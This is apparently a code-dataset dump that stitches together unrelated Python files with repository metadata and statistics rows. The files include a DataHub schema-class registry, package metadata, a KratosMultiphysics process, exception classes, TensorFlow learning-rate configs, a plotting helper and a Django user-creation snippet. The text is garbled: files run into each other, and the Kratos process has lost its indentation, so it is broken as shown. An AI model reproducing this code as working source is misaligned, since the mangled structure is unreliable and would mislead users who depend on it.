'com.linkedin.pegasus2avro.ml.metadata.EvaluationData': EvaluationDataClass,
'com.linkedin.pegasus2avro.ml.metadata.IntendedUse': IntendedUseClass,
'com.linkedin.pegasus2avro.ml.metadata.IntendedUserType': IntendedUserTypeClass,
'com.linkedin.pegasus2avro.ml.metadata.MLFeatureProperties': MLFeaturePropertiesClass,
'com.linkedin.pegasus2avro.ml.metadata.MLFeatureTableProperties': MLFeatureTablePropertiesClass,
'com.linkedin.pegasus2avro.ml.metadata.MLModelFactorPrompts': MLModelFactorPromptsClass,
'com.linkedin.pegasus2avro.ml.metadata.MLModelFactors': MLModelFactorsClass,
'com.linkedin.pegasus2avro.ml.metadata.MLModelProperties': MLModelPropertiesClass,
'com.linkedin.pegasus2avro.ml.metadata.MLPrimaryKeyProperties': MLPrimaryKeyPropertiesClass,
'com.linkedin.pegasus2avro.ml.metadata.Metrics': MetricsClass,
'com.linkedin.pegasus2avro.ml.metadata.QuantitativeAnalyses': QuantitativeAnalysesClass,
'com.linkedin.pegasus2avro.ml.metadata.SourceCode': SourceCodeClass,
'com.linkedin.pegasus2avro.ml.metadata.SourceCodeUrl': SourceCodeUrlClass,
'com.linkedin.pegasus2avro.ml.metadata.SourceCodeUrlType': SourceCodeUrlTypeClass,
'com.linkedin.pegasus2avro.ml.metadata.TrainingData': TrainingDataClass,
'com.linkedin.pegasus2avro.mxe.MetadataAuditEvent': MetadataAuditEventClass,
'com.linkedin.pegasus2avro.mxe.MetadataChangeEvent': MetadataChangeEventClass,
'com.linkedin.pegasus2avro.schema.ArrayType': ArrayTypeClass,
'com.linkedin.pegasus2avro.schema.BinaryJsonSchema': BinaryJsonSchemaClass,
'com.linkedin.pegasus2avro.schema.BooleanType': BooleanTypeClass,
'com.linkedin.pegasus2avro.schema.BytesType': BytesTypeClass,
'com.linkedin.pegasus2avro.schema.DatasetFieldForeignKey': DatasetFieldForeignKeyClass,
'com.linkedin.pegasus2avro.schema.DateType': DateTypeClass,
'com.linkedin.pegasus2avro.schema.EditableSchemaFieldInfo': EditableSchemaFieldInfoClass,
'com.linkedin.pegasus2avro.schema.EditableSchemaMetadata': EditableSchemaMetadataClass,
'com.linkedin.pegasus2avro.schema.EnumType': EnumTypeClass,
'com.linkedin.pegasus2avro.schema.EspressoSchema': EspressoSchemaClass,
'com.linkedin.pegasus2avro.schema.FixedType': FixedTypeClass,
'com.linkedin.pegasus2avro.schema.ForeignKeySpec': ForeignKeySpecClass,
'com.linkedin.pegasus2avro.schema.KafkaSchema': KafkaSchemaClass,
'com.linkedin.pegasus2avro.schema.KeyValueSchema': KeyValueSchemaClass,
'com.linkedin.pegasus2avro.schema.MapType': MapTypeClass,
'com.linkedin.pegasus2avro.schema.MySqlDDL': MySqlDDLClass,
'com.linkedin.pegasus2avro.schema.NullType': NullTypeClass,
'com.linkedin.pegasus2avro.schema.NumberType': NumberTypeClass,
'com.linkedin.pegasus2avro.schema.OracleDDL': OracleDDLClass,
'com.linkedin.pegasus2avro.schema.OrcSchema': OrcSchemaClass,
'com.linkedin.pegasus2avro.schema.OtherSchema': OtherSchemaClass,
'com.linkedin.pegasus2avro.schema.PrestoDDL': PrestoDDLClass,
'com.linkedin.pegasus2avro.schema.RecordType': RecordTypeClass,
'com.linkedin.pegasus2avro.schema.SchemaField': SchemaFieldClass,
'com.linkedin.pegasus2avro.schema.SchemaFieldDataType': SchemaFieldDataTypeClass,
'com.linkedin.pegasus2avro.schema.SchemaMetadata': SchemaMetadataClass,
'com.linkedin.pegasus2avro.schema.Schemaless': SchemalessClass,
'com.linkedin.pegasus2avro.schema.StringType': StringTypeClass,
'com.linkedin.pegasus2avro.schema.TimeType': TimeTypeClass,
'com.linkedin.pegasus2avro.schema.UnionType': UnionTypeClass,
'com.linkedin.pegasus2avro.schema.UrnForeignKey': UrnForeignKeyClass,
'com.linkedin.pegasus2avro.tag.TagProperties': TagPropertiesClass,
'com.linkedin.pegasus2avro.usage.FieldUsageCounts': FieldUsageCountsClass,
'com.linkedin.pegasus2avro.usage.UsageAggregation': UsageAggregationClass,
'com.linkedin.pegasus2avro.usage.UsageAggregationMetrics': UsageAggregationMetricsClass,
'com.linkedin.pegasus2avro.usage.UserUsageCounts': UserUsageCountsClass,
'KafkaAuditHeader': KafkaAuditHeaderClass,
'ChartInfo': ChartInfoClass,
'ChartQuery': ChartQueryClass,
'ChartQueryType': ChartQueryTypeClass,
'ChartType': ChartTypeClass,
'EditableChartProperties': EditableChartPropertiesClass,
'AccessLevel': AccessLevelClass,
'AuditStamp': AuditStampClass,
'BrowsePaths': BrowsePathsClass,
'ChangeAuditStamps': ChangeAuditStampsClass,
'Cost': CostClass,
'CostCost': CostCostClass,
'CostCostDiscriminator': CostCostDiscriminatorClass,
'CostType': CostTypeClass,
'Deprecation': DeprecationClass,
'FabricType': FabricTypeClass,
'GlobalTags': GlobalTagsClass,
'GlossaryTermAssociation': GlossaryTermAssociationClass,
'GlossaryTerms': GlossaryTermsClass,
'InstitutionalMemory': InstitutionalMemoryClass,
'InstitutionalMemoryMetadata': InstitutionalMemoryMetadataClass,
'MLFeatureDataType': MLFeatureDataTypeClass,
'Owner': OwnerClass,
'Ownership': OwnershipClass,
'OwnershipSource': OwnershipSourceClass,
'OwnershipSourceType': OwnershipSourceTypeClass,
'OwnershipType': OwnershipTypeClass,
'Status': StatusClass,
'TagAssociation': TagAssociationClass,
'VersionTag': VersionTagClass,
'WindowDuration': WindowDurationClass,
'TransformationType': TransformationTypeClass,
'UDFTransformer': UDFTransformerClass,
'DashboardInfo': DashboardInfoClass,
'EditableDashboardProperties': EditableDashboardPropertiesClass,
'DataFlowInfo': DataFlowInfoClass,
'DataJobInfo': DataJobInfoClass,
'DataJobInputOutput': DataJobInputOutputClass,
'EditableDataFlowProperties': EditableDataFlowPropertiesClass,
'EditableDataJobProperties': EditableDataJobPropertiesClass,
'JobStatus': JobStatusClass,
'AzkabanJobType': AzkabanJobTypeClass,
'DataPlatformInfo': DataPlatformInfoClass,
'PlatformType': PlatformTypeClass,
'DataProcessInfo': DataProcessInfoClass,
'DatasetDeprecation': DatasetDeprecationClass,
'DatasetFieldMapping': DatasetFieldMappingClass,
'DatasetLineageType': DatasetLineageTypeClass,
'DatasetProperties': DatasetPropertiesClass,
'DatasetUpstreamLineage': DatasetUpstreamLineageClass,
'EditableDatasetProperties': EditableDatasetPropertiesClass,
'Upstream': UpstreamClass,
'UpstreamLineage': UpstreamLineageClass,
'GlossaryNodeInfo': GlossaryNodeInfoClass,
'GlossaryTermInfo': GlossaryTermInfoClass,
'CorpGroupInfo': CorpGroupInfoClass,
'CorpUserEditableInfo': CorpUserEditableInfoClass,
'CorpUserInfo': CorpUserInfoClass,
'ChartKey': ChartKeyClass,
'CorpGroupKey': CorpGroupKeyClass,
'CorpUserKey': CorpUserKeyClass,
'DashboardKey': DashboardKeyClass,
'DataFlowKey': DataFlowKeyClass,
'DataJobKey': DataJobKeyClass,
'DataPlatformKey': DataPlatformKeyClass,
'DataProcessKey': DataProcessKeyClass,
'DatasetKey': DatasetKeyClass,
'GlossaryNodeKey': GlossaryNodeKeyClass,
'GlossaryTermKey': GlossaryTermKeyClass,
'MLFeatureKey': MLFeatureKeyClass,
'MLFeatureTableKey': MLFeatureTableKeyClass,
'MLModelKey': MLModelKeyClass,
'MLPrimaryKeyKey': MLPrimaryKeyKeyClass,
'TagKey': TagKeyClass,
'ChartSnapshot': ChartSnapshotClass,
'CorpGroupSnapshot': CorpGroupSnapshotClass,
'CorpUserSnapshot': CorpUserSnapshotClass,
'DashboardSnapshot': DashboardSnapshotClass,
'DataFlowSnapshot': DataFlowSnapshotClass,
'DataJobSnapshot': DataJobSnapshotClass,
'DataPlatformSnapshot': DataPlatformSnapshotClass,
'DataProcessSnapshot': DataProcessSnapshotClass,
'DatasetSnapshot': DatasetSnapshotClass,
'GlossaryNodeSnapshot': GlossaryNodeSnapshotClass,
'GlossaryTermSnapshot': GlossaryTermSnapshotClass,
'MLFeatureSnapshot': MLFeatureSnapshotClass,
'MLFeatureTableSnapshot': MLFeatureTableSnapshotClass,
'MLModelSnapshot': MLModelSnapshotClass,
'MLPrimaryKeySnapshot': MLPrimaryKeySnapshotClass,
'TagSnapshot': TagSnapshotClass,
'BaseData': BaseDataClass,
'CaveatDetails': CaveatDetailsClass,
'CaveatsAndRecommendations': CaveatsAndRecommendationsClass,
'EthicalConsiderations': EthicalConsiderationsClass,
'EvaluationData': EvaluationDataClass,
'IntendedUse': IntendedUseClass,
'IntendedUserType': IntendedUserTypeClass,
'MLFeatureProperties': MLFeaturePropertiesClass,
'MLFeatureTableProperties': MLFeatureTablePropertiesClass,
'MLModelFactorPrompts': MLModelFactorPromptsClass,
'MLModelFactors': MLModelFactorsClass,
'MLModelProperties': MLModelPropertiesClass,
'MLPrimaryKeyProperties': MLPrimaryKeyPropertiesClass,
'Metrics': MetricsClass,
'QuantitativeAnalyses': QuantitativeAnalysesClass,
'SourceCode': SourceCodeClass,
'SourceCodeUrl': SourceCodeUrlClass,
'SourceCodeUrlType': SourceCodeUrlTypeClass,
'TrainingData': TrainingDataClass,
'MetadataAuditEvent': MetadataAuditEventClass,
'MetadataChangeEvent': MetadataChangeEventClass,
'ArrayType': ArrayTypeClass,
'BinaryJsonSchema': BinaryJsonSchemaClass,
'BooleanType': BooleanTypeClass,
'BytesType': BytesTypeClass,
'DatasetFieldForeignKey': DatasetFieldForeignKeyClass,
'DateType': DateTypeClass,
'EditableSchemaFieldInfo': EditableSchemaFieldInfoClass,
'EditableSchemaMetadata': EditableSchemaMetadataClass,
'EnumType': EnumTypeClass,
'EspressoSchema': EspressoSchemaClass,
'FixedType': FixedTypeClass,
'ForeignKeySpec': ForeignKeySpecClass,
'KafkaSchema': KafkaSchemaClass,
'KeyValueSchema': KeyValueSchemaClass,
'MapType': MapTypeClass,
'MySqlDDL': MySqlDDLClass,
'NullType': NullTypeClass,
'NumberType': NumberTypeClass,
'OracleDDL': OracleDDLClass,
'OrcSchema': OrcSchemaClass,
'OtherSchema': OtherSchemaClass,
'PrestoDDL': PrestoDDLClass,
'RecordType': RecordTypeClass,
'SchemaField': SchemaFieldClass,
'SchemaFieldDataType': SchemaFieldDataTypeClass,
'SchemaMetadata': SchemaMetadataClass,
'Schemaless': SchemalessClass,
'StringType': StringTypeClass,
'TimeType': TimeTypeClass,
'UnionType': UnionTypeClass,
'UrnForeignKey': UrnForeignKeyClass,
'TagProperties': TagPropertiesClass,
'FieldUsageCounts': FieldUsageCountsClass,
'UsageAggregation': UsageAggregationClass,
'UsageAggregationMetrics': UsageAggregationMetricsClass,
'UserUsageCounts': UserUsageCountsClass,
}
_json_converter = avrojson.AvroJsonConverter(use_logical_types=False, schema_types=__SCHEMA_TYPES)
# fmt: on
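The `__SCHEMA_TYPES` registry above maps both the fully-qualified Avro record name and the bare record name to the same generated class, so the JSON converter can resolve either form. A minimal sketch of that dual-key lookup (the classes here are hypothetical stand-ins, not the generated types):

```python
# Hypothetical stand-in; the real registry maps Avro record names
# to the generated *Class wrapper types shown above.
class TagPropertiesSketch:
    pass


SCHEMA_TYPES = {
    # The fully-qualified Avro record name ...
    'com.linkedin.pegasus2avro.tag.TagProperties': TagPropertiesSketch,
    # ... and the bare record name resolve to the same class object.
    'TagProperties': TagPropertiesSketch,
}


def resolve_schema_type(name: str) -> type:
    """Look up the wrapper class for either name form."""
    return SCHEMA_TYPES[name]
```

Registering both spellings means callers deserializing payloads that carry short names and callers using namespaced names go through one table.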
] | null | null | null | """Metadata for readcomp"""
__title__ = "readcomp"
__description__ = "Reading comprehension passage generator"
__url__ = "https://github.com/acciochris/readcomp"
__version__ = "0.1.0"
__author__ = "Chang Liu"
__license__ = "MIT"
__copyright__ = "Copyright 2020 Chang Liu"
from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7
# Importing the Kratos Library
import KratosMultiphysics
# Import applications
import KratosMultiphysics.MeshingApplication as MeshingApplication
def Factory(settings, Model):
    if not isinstance(settings, KratosMultiphysics.Parameters):
        raise Exception("expected input shall be a Parameters object, encapsulating a json string")
return IntegrationValuesExtrapolationToNodesProcess(Model, settings["Parameters"])
## All the processes python should be derived from "Process"
class IntegrationValuesExtrapolationToNodesProcess(KratosMultiphysics.Process):
    def __init__(self, Model, settings):
KratosMultiphysics.Process.__init__(self)
default_settings = KratosMultiphysics.Parameters("""
{
"help" : "This process extrapolates the values from integration points to the mesh nodes",
"model_part_name" : "",
"echo_level" : 0,
"average_variable" : "NODAL_AREA",
"area_average" : true,
"list_of_variables" : [],
"extrapolate_non_historical" : true
}
"""
)
settings.ValidateAndAssignDefaults(default_settings)
self.model_part = Model[settings["model_part_name"].GetString()]
extrapolation_parameters = KratosMultiphysics.Parameters("""{}""")
extrapolation_parameters.AddValue("echo_level", settings["echo_level"])
extrapolation_parameters.AddValue("average_variable", settings["average_variable"])
extrapolation_parameters.AddValue("area_average", settings["area_average"])
extrapolation_parameters.AddValue("list_of_variables", settings["list_of_variables"])
extrapolation_parameters.AddValue("extrapolate_non_historical", settings["extrapolate_non_historical"])
self.integration_values_extrapolation_to_nodes_process = MeshingApplication.IntegrationValuesExtrapolationToNodesProcess(self.model_part, extrapolation_parameters)
def ExecuteInitialize(self):
pass
def ExecuteBeforeSolutionLoop(self):
self.integration_values_extrapolation_to_nodes_process.ExecuteBeforeSolutionLoop()
def ExecuteInitializeSolutionStep(self):
pass
def ExecuteFinalizeSolutionStep(self):
self.integration_values_extrapolation_to_nodes_process.ExecuteFinalizeSolutionStep()
def ExecuteBeforeOutputStep(self):
pass
def ExecuteAfterOutputStep(self):
pass
def ExecuteFinalize(self):
self.integration_values_extrapolation_to_nodes_process.ExecuteFinalize()
def Clear(self):
pass
| 41.671642 | 171 | 0.718123 | 246 | 2,792 | 7.861789 | 0.369919 | 0.083247 | 0.080145 | 0.070321 | 0.105481 | 0.105481 | 0.105481 | 0.080662 | 0 | 0 | 0 | 0.002252 | 0.204871 | 2,792 | 66 | 172 | 42.30303 | 0.868919 | 0.062679 | 0 | 0.106383 | 0 | 0 | 0.271543 | 0.03064 | 0 | 0 | 0 | 0 | 0 | 1 | 0.212766 | false | 0.106383 | 0.06383 | 0 | 0.319149 | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
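The `settings.ValidateAndAssignDefaults(default_settings)` call above merges the user-supplied settings over the defaults, rejecting unknown keys. A hand-rolled stand-in on plain dicts (not the Kratos `Parameters` API, which also validates nested structure and value types) behaves roughly like:

```python
import json

def validate_and_assign_defaults(settings: dict, defaults: dict) -> dict:
    """Reject keys absent from defaults, then fill in missing ones."""
    unknown = set(settings) - set(defaults)
    if unknown:
        raise ValueError(f"unknown settings: {sorted(unknown)}")
    merged = dict(defaults)
    merged.update(settings)  # user values win over defaults
    return merged

# Defaults mirror (a subset of) the JSON block in the process above.
defaults = json.loads("""{
    "model_part_name": "",
    "echo_level": 0,
    "area_average": true,
    "list_of_variables": [],
    "extrapolate_non_historical": true
}""")

merged = validate_and_assign_defaults({"echo_level": 1}, defaults)
print(merged["echo_level"], merged["area_average"])  # 1 True
```

A misspelled key fails fast with `ValueError` instead of being silently ignored, which is the main point of validating against defaults.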
137867e7fe0fedffccbcd7151a465433205af790 | 483 | py | Python | ldsbde/core/exc.py | linz/lds-bde-loader | 15b5fbc962c4766b73893fa01bdde6ca9a3a6807 | [
"BSD-3-Clause"
] | null | null | null | ldsbde/core/exc.py | linz/lds-bde-loader | 15b5fbc962c4766b73893fa01bdde6ca9a3a6807 | [
"BSD-3-Clause"
] | 2 | 2019-05-08T07:58:01.000Z | 2019-08-05T08:09:03.000Z | ldsbde/core/exc.py | linz/lds-bde-loader | 15b5fbc962c4766b73893fa01bdde6ca9a3a6807 | [
"BSD-3-Clause"
] | null | null | null | """lds-bde-loader exception classes."""
class Error(Exception):
"""Generic errors."""
def __init__(self, msg):
super(Error, self).__init__()
self.msg = msg
def __str__(self):
return "%s: %s" % (self.__class__.__name__, self.msg)
class ConfigError(Error):
"""Config related errors."""
pass
class RuntimeError(Error):  # NOTE: intentionally shadows Python's built-in RuntimeError within this module
"""Generic runtime errors."""
pass
class ArgumentError(Error):
"""Argument related errors."""
pass
| 18.576923 | 61 | 0.616977 | 53 | 483 | 5.245283 | 0.490566 | 0.07554 | 0.079137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.225673 | 483 | 25 | 62 | 19.32 | 0.743316 | 0.250518 | 0 | 0.25 | 0 | 0 | 0.017857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.25 | 0 | 0.083333 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
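A quick sketch of how this exception hierarchy behaves (`Error` and `ConfigError` are re-declared here so the snippet runs standalone; in the package you would import them from `ldsbde.core.exc`):

```python
class Error(Exception):
    """Generic errors."""

    def __init__(self, msg):
        super(Error, self).__init__()
        self.msg = msg

    def __str__(self):
        # Reports the concrete subclass name, so logs show the error
        # type without callers inspecting the exception object.
        return "%s: %s" % (self.__class__.__name__, self.msg)


class ConfigError(Error):
    """Config related errors."""
    pass


err = ConfigError("missing [db] section")
print(str(err))  # ConfigError: missing [db] section
```

Because `__str__` lives on the base class, every subclass gets a consistently formatted message for free.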
138cf005d7526037c858c8d41fdc39bfc0da0ab3 | 6,428 | py | Python | official/modeling/optimization/configs/learning_rate_config.py | dravenVN1994/models | 8490298349a6ed77d4b4696572ed7d0ca101939c | [
"Apache-2.0"
] | 1 | 2018-08-21T22:06:10.000Z | 2018-08-21T22:06:10.000Z | official/modeling/optimization/configs/learning_rate_config.py | songhappy/models | 54832af86a4f756ec95124511483966a2575f95d | [
"Apache-2.0"
] | null | null | null | official/modeling/optimization/configs/learning_rate_config.py | songhappy/models | 54832af86a4f756ec95124511483966a2575f95d | [
"Apache-2.0"
] | 1 | 2020-08-31T19:12:34.000Z | 2020-08-31T19:12:34.000Z | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Dataclasses for learning rate schedule config."""
from typing import List, Optional
import dataclasses
from official.modeling.hyperparams import base_config
@dataclasses.dataclass
class ConstantLrConfig(base_config.Config):
"""Configuration for constant learning rate.
  This class is a container for the constant learning rate decay configs.
Attributes:
name: The name of the learning rate schedule. Defaults to Constant.
learning_rate: A float. The learning rate. Defaults to 0.1.
"""
name: str = 'Constant'
learning_rate: float = 0.1
@dataclasses.dataclass
class StepwiseLrConfig(base_config.Config):
"""Configuration for stepwise learning rate decay.
This class is a container for the piecewise constant learning rate scheduling
configs. It will configure an instance of PiecewiseConstantDecay keras
learning rate schedule.
An example (from keras docs): use a learning rate that's 1.0 for the first
100001 steps, 0.5 for the next 10000 steps, and 0.1 for any additional steps.
```python
boundaries: [100000, 110000]
values: [1.0, 0.5, 0.1]
  ```
Attributes:
name: The name of the learning rate schedule. Defaults to PiecewiseConstant.
boundaries: A list of ints of strictly increasing entries. Defaults to None.
values: A list of floats that specifies the values for the intervals defined
by `boundaries`. It should have one more element than `boundaries`.
The learning rate is computed as follows: [0, boundaries[0]] ->
values[0] [boundaries[0], boundaries[1]] -> values[1]
[boundaries[n-1], boundaries[n]] -> values[n] [boundaries[n],
end] -> values[n+1] Defaults to None.
"""
name: str = 'PiecewiseConstantDecay'
boundaries: Optional[List[int]] = None
values: Optional[List[float]] = None
@dataclasses.dataclass
class ExponentialLrConfig(base_config.Config):
"""Configuration for exponential learning rate decay.
  This class is a container for the exponential learning rate decay configs.
Attributes:
name: The name of the learning rate schedule. Defaults to ExponentialDecay.
initial_learning_rate: A float. The initial learning rate. Defaults to None.
decay_steps: A positive integer that is used for decay computation. Defaults
to None.
decay_rate: A float. Defaults to None.
    staircase: A boolean, if true, learning rate is decreased at discrete
intervals. Defaults to False.
"""
name: str = 'ExponentialDecay'
initial_learning_rate: Optional[float] = None
decay_steps: Optional[int] = None
decay_rate: Optional[float] = None
staircase: Optional[bool] = None
@dataclasses.dataclass
class PolynomialLrConfig(base_config.Config):
"""Configuration for polynomial learning rate decay.
  This class is a container for the polynomial learning rate decay configs.
Attributes:
name: The name of the learning rate schedule. Defaults to PolynomialDecay.
initial_learning_rate: A float. The initial learning rate. Defaults to None.
decay_steps: A positive integer that is used for decay computation. Defaults
to None.
end_learning_rate: A float. The minimal end learning rate.
power: A float. The power of the polynomial. Defaults to linear, 1.0.
cycle: A boolean, whether or not it should cycle beyond decay_steps.
Defaults to False.
"""
name: str = 'PolynomialDecay'
initial_learning_rate: Optional[float] = None
decay_steps: Optional[int] = None
end_learning_rate: float = 0.0001
power: float = 1.0
cycle: bool = False
@dataclasses.dataclass
class CosineLrConfig(base_config.Config):
"""Configuration for Cosine learning rate decay.
  This class is a container for the cosine learning rate decay configs,
tf.keras.experimental.CosineDecay.
Attributes:
name: The name of the learning rate schedule. Defaults to CosineDecay.
initial_learning_rate: A float. The initial learning rate. Defaults to None.
decay_steps: A positive integer that is used for decay computation. Defaults
to None.
alpha: A float. Minimum learning rate value as a fraction of
initial_learning_rate.
"""
name: str = 'CosineDecay'
initial_learning_rate: Optional[float] = None
decay_steps: Optional[int] = None
alpha: float = 0.0
@dataclasses.dataclass
class LinearWarmupConfig(base_config.Config):
"""Configuration for linear warmup schedule config.
This class is a container for the linear warmup schedule configs.
Warmup_learning_rate is the initial learning rate, the final learning rate of
the warmup period is the learning_rate of the optimizer in use. The learning
rate at each step linearly increased according to the following formula:
  lr(step) = warmup_learning_rate +
      step / warmup_steps * (final_learning_rate - warmup_learning_rate).
Using warmup overrides the learning rate schedule by the number of warmup
steps.
Attributes:
name: The name of warmup schedule. Defaults to linear.
warmup_learning_rate: Initial learning rate for the warmup. Defaults to 0.
warmup_steps: Warmup steps. Defaults to None.
"""
name: str = 'linear'
warmup_learning_rate: float = 0
warmup_steps: Optional[int] = None
@dataclasses.dataclass
class PolynomialWarmupConfig(base_config.Config):
"""Configuration for linear warmup schedule config.
This class is a container for the polynomial warmup schedule configs.
Attributes:
name: The name of warmup schedule. Defaults to Polynomial.
power: Polynomial power. Defaults to 1.
warmup_steps: Warmup steps. Defaults to None.
"""
name: str = 'polynomial'
power: float = 1
warmup_steps: Optional[int] = None
| 37.811765 | 80 | 0.733043 | 871 | 6,428 | 5.344432 | 0.223881 | 0.128894 | 0.04898 | 0.043609 | 0.401289 | 0.319871 | 0.318367 | 0.3029 | 0.3029 | 0.264232 | 0 | 0.013591 | 0.187306 | 6,428 | 169 | 81 | 38.035503 | 0.877489 | 0.733354 | 0 | 0.348837 | 0 | 0 | 0.058433 | 0.014608 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.069767 | 0 | 0.837209 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
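The boundaries/values lookup that `StepwiseLrConfig` describes can be sketched in plain Python (a hand-rolled stand-in for Keras' `PiecewiseConstantDecay`, not the TensorFlow implementation itself):

```python
from bisect import bisect_left

def piecewise_constant(step, boundaries, values):
    """Return values[i] for the interval containing `step`.

    `boundaries` must be strictly increasing, and `values` must have
    exactly one more element than `boundaries`.
    """
    assert len(values) == len(boundaries) + 1
    # bisect_left counts boundaries strictly below `step`, which matches
    # the inclusive-left intervals [0, b0], (b0, b1], ..., (bn, end).
    return values[bisect_left(boundaries, step)]

boundaries = [100000, 110000]
values = [1.0, 0.5, 0.1]
print(piecewise_constant(50000, boundaries, values))   # 1.0
print(piecewise_constant(105000, boundaries, values))  # 0.5
print(piecewise_constant(200000, boundaries, values))  # 0.1
```

Using `bisect_left` keeps a step equal to a boundary in the earlier interval, matching the "`step <= boundaries[0]` gives `values[0]`" convention from the docstring above.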
138f85c266c67ac474d6478497e3e4d6cc00eb90 | 2,159 | py | Python | ImitationLearning/Plot.py | gautam-sharma1/Imitation-Learning | 20b6fcd2a8d6de8eb95e6831f5b379a083306361 | [
"MIT"
] | null | null | null | ImitationLearning/Plot.py | gautam-sharma1/Imitation-Learning | 20b6fcd2a8d6de8eb95e6831f5b379a083306361 | [
"MIT"
] | null | null | null | ImitationLearning/Plot.py | gautam-sharma1/Imitation-Learning | 20b6fcd2a8d6de8eb95e6831f5b379a083306361 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import pandas as pd
class Plot:
def __init__(self, input_list, output_list):
self.df1 = pd.DataFrame(input_list) # x1, y1, x2, y2, x3, y3 .. ...
self.df2 = pd.DataFrame(output_list) # theta1, theta 2 ....
self.X_train = self.df1.iloc[:,:].values
self.y_train = self.df2.iloc[:,:].values
def plot_2link_data(self):
"""
Plots first 100 input data points
:return:
"""
plt.scatter(self.X_train[:100,0], self.X_train[:100,1])
plt.scatter(self.X_train[:100,2], self.X_train[:100,3])
def plot_2link_labels(self):
"""
Plots first 100 target values
:return:
"""
plt.scatter(range(100),self.y_train[:100,0])
plt.scatter(range(100),self.y_train[:100,1])
def plot_3link_data(self):
"""
Plots first 100 input data points
:return:
"""
plt.scatter(self.X_train[:100,0], self.X_train[:100,1])
plt.scatter(self.X_train[:100,2], self.X_train[:100,3])
plt.scatter(self.X_train[:100,4], self.X_train[:100,5])
def plot_3link_labels(self):
"""
Plots first 100 target values
:return:
"""
plt.scatter(range(100),self.y_train[:100,0])
plt.scatter(range(100),self.y_train[:100,1])
plt.scatter(range(100),self.y_train[:100,2])
@staticmethod
def plot_3link_validation(y, prediction, epoch = 0):
fig = plt.figure()
plt.scatter(y[:,0],prediction.to('cpu')[:,0])
plt.scatter(y[:,1],prediction.to('cpu')[:,1])
plt.scatter(y[:,2],prediction.to('cpu')[:,2])
        plt.xlabel("Ground truth")
        plt.ylabel("Prediction")
        # Save after the labels are set so they appear in the written file
        fig.savefig("theta1_iter" + str(epoch), dpi=300)
plt.show()
@staticmethod
def plot_2link_validation(y, prediction, epoch=0):
fig = plt.figure()
plt.scatter(y[:,0],prediction.to('cpu')[:,0])
plt.scatter(y[:,1],prediction.to('cpu')[:,1])
        plt.xlabel("Ground truth")
        plt.ylabel("Prediction")
        # Save after the labels are set so they appear in the written file
        fig.savefig("theta1_iter" + str(epoch), dpi=300)
plt.show() | 32.223881 | 76 | 0.576193 | 302 | 2,159 | 3.990066 | 0.221854 | 0.124481 | 0.091286 | 0.107884 | 0.705394 | 0.705394 | 0.686307 | 0.686307 | 0.660581 | 0.660581 | 0 | 0.07716 | 0.249653 | 2,159 | 67 | 77 | 32.223881 | 0.666667 | 0.099583 | 0 | 0.585366 | 0 | 0 | 0.04453 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170732 | false | 0 | 0.04878 | 0 | 0.243902 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
13a807cee2abc98353fd52bdfd984de3bbc6a986 | 370 | py | Python | Chapter 3/restful_python_chapter_03_04/users_test_01.py | Mohamed2011-bit/Building-RESTful-Python-Web-Services | 503c9b5fec57eeb58397514f3168c3c5248724a3 | [
"MIT"
] | 116 | 2016-12-07T00:50:04.000Z | 2022-03-31T06:34:02.000Z | Chapter 3/restful_python_chapter_03_04/users_test_01.py | Mohamed2011-bit/Building-RESTful-Python-Web-Services | 503c9b5fec57eeb58397514f3168c3c5248724a3 | [
"MIT"
] | 5 | 2018-09-29T20:48:05.000Z | 2021-06-10T18:21:51.000Z | Chapter 3/restful_python_chapter_03_04/users_test_01.py | Mohamed2011-bit/Building-RESTful-Python-Web-Services | 503c9b5fec57eeb58397514f3168c3c5248724a3 | [
"MIT"
] | 79 | 2017-01-02T05:16:01.000Z | 2022-02-16T04:23:52.000Z | """
Book: Building RESTful Python Web Services
Chapter 3: Improving and adding authentication to an API with Django
Author: Gaston C. Hillar - Twitter.com/gastonhillar
Publisher: Packt Publishing Ltd. - http://www.packtpub.com
"""
from django.contrib.auth.models import User
user = User.objects.create_user('kevin', 'kevin@example.com', 'kevinpassword')
user.save()
